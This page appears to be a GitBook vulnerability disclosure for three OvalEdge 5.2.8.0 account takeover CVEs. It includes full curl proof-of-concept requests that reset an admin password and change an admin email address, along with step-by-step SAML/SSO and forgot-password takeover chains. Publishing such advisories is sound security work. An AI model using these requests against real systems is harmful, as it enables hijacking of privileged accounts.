🕵️
CVEs
OvalEdge
OvalEdge
  • ⚠️OvalEdge 5.2.8.0 Vulnerability Disclosures
  • Vulnerabilities
    • ❗Sensitive Data Exposure
    • ‼️Account Takeover
    • ‼️Privilege Escalation
    • ❗Stored XSS
Powered by GitBook
On this page
  • Account Takeover - Change local privileged user password (authenticated)
  • CVE-2022-30358
  • Account Takeover - Change local privileged user email address (authenticated)
  • CVE-2022-30357
  • Account Takeover - Change SAML/SSO privileged user email address (authenticated)
  • CVE-2022-30355
  1. Vulnerabilities

Account Takeover

OvalEdge 5.2.8.0 and earlier is affected by multiple account takeover vulnerabilities.

Account Takeover - Change local privileged user password (authenticated)

CVE-2022-30358

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /user/updatePassword via the userId and newPsw parameters . Authentication is required.

https://example.com/ovaledge/user/updatePassword

Example CURL Request

curl -k 'http://example.com:8080/ovaledge/user/updatePassword' \ -H 'Accept: */*' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \ -H 'Cookie: oe-loc=en; JSESSIONID=NDQ3MzgxM2YtYTFlYS00OTUyLWE0MmItNDYzMmIwZDVhOWUx' \ -H 'Origin: http://example.com:8080' \ -H 'Proxy-Connection: keep-alive' \ -H 'Referer: http://example.com:8080/ovaledge/' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ --data-raw $'userId=admin&newPsw=NewPassword123&adminServce=false&user' \ --compressed \ --insecure

Account Takeover - Change local privileged user email address (authenticated)

CVE-2022-30357

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /profile/updateProfile via the userId and email parameters . Authentication is required.

https://example.com/ovaledge/profile/updateProfile

Once the privileged users email address is updated to an email account the attacker controls, the attacker uses the forgot password feature to reset the victim account password. SMTP must be configured properly for the password reset email to be sent.

Example CURL Request

curl -k 'http://example.com:8080/ovaledge/profile/updateProfile' \ -H 'Accept: */*' \ -H 'Accept-Language: en-US,en;q=0.9' \ -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx632L1l5AnBf76MC' \ -H 'Cookie: oe-loc=en; JSESSIONID=OGU2OWIxYTgtYTA4Yi00M2QyLTg5YmItMjY4ODczOWNjYWNl' \ -H 'Origin: http://example.com:8080' \ -H 'Proxy-Connection: keep-alive' \ -H 'Referer: http://example.com:8080/ovaledge/' \ -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \ -H 'X-Requested-With: XMLHttpRequest' \ --data-raw $'------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="fname"\r\n\r\nAdmin\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="lname"\r\n\r\nOvalEdge\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="email"\r\n\r\n[email protected]\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="userid"\r\n\r\nadmin\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="phone"\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="slackid"\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="picture"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="stackId"\r\n\r\n\r\n------WebKitFormBoundaryx632L1l5AnBf76MC\r\nContent-Disposition: form-data; name="userId"\r\n\r\nadmin\r\n------WebKitFormBoundaryx632L1l5AnBf76MC--\r\n' \ --compressed \ --insecure

Account Takeover - Change SAML/SSO privileged user email address (authenticated)

CVE-2022-30355

OvalEdge 5.2.8.0 and earlier is affected by an Account Takeover vulnerability via a POST request to /profile/updateProfile via the userId and email parameters . Authentication is required.

https://example.com/ovaledge/profile/updateProfile

In this scenario, the attacker updates their own email address to an off-premise attacker controlled email address. Next, they update the privileged user email address to their own SAML/SSO organizational email address. Logout. Re-Authenticate via SAML/SSO. Attacker has now taken over the privileged user account.

PreviousSensitive Data ExposureNextPrivilege Escalation

Last updated 11 months ago

‼️
Page cover image